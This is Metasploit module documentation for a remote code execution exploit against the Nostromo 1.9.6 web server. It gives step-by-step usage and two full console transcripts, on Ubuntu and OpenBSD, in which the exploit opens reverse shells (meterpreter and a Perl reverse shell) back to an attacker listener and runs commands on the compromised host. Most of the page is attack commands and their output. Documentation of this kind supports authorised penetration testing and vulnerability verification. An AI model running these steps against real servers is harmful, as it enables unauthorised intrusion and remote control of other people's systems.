## Vulnerable Application

Verified against:

* Nostromo 1.9.6 on Linux

Nostromo sources can be downloaded from http://www.nazgul.ch/dev_nostromo.html

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/nostromo_code_exec`
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `check`
  7. Do: `set payload linux/x86/meterpreter/reverse_tcp`
  8. Do: `set lhost <ip>`
  9. Do: `exploit`
  10. You should get a shell.

## Scenarios

Example utilizing nostromo 1.9.6 on Ubuntu Linux.

```
msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8000
RPORT => 8000
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8000 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 1
target => 1
msf exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444 
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x86/meterpreter/reverse_tcp command stager
[*] Sending stage (985320 bytes) to 192.168.1.9
[*] Meterpreter session 2 opened (192.168.1.10:4444 -> 192.168.1.9:52544) at 2019-10-29 16:08:18 +0100
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : nostromo.local
OS           : Ubuntu 18.04 (Linux 4.15.0-62-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.9 - Meterpreter session 2 closed.  Reason: User exit
```

nostromo 1.9.6 on OpenBSD.

```
msf > use exploit/multi/http/nostromo_code_exec
msf exploit(multi/http/nostromo_code_exec) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf exploit(multi/http/nostromo_code_exec) > set RPORT 8001
RPORT => 8001
msf exploit(multi/http/nostromo_code_exec) > check
[*] 192.168.1.9:8001 - The target appears to be vulnerable.
msf exploit(multi/http/nostromo_code_exec) > set target 0
target => 0
msf exploit(multi/http/nostromo_code_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(multi/http/nostromo_code_exec) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(multi/http/nostromo_code_exec) > set LPORT 4444
LPORT => 4444
msf exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.1.10:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.9:52312) at 2019-10-29 15:48:28 +0100
id
uid=536(_nostromo) gid=536(_nostromo) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
uname -avr
OpenBSD nostromo.local 6.4 GENERIC#349 amd64
^C
Abort session 1? [y/N]  y
[*] 192.168.1.9 - Command shell session 1 closed.  Reason: User exit
```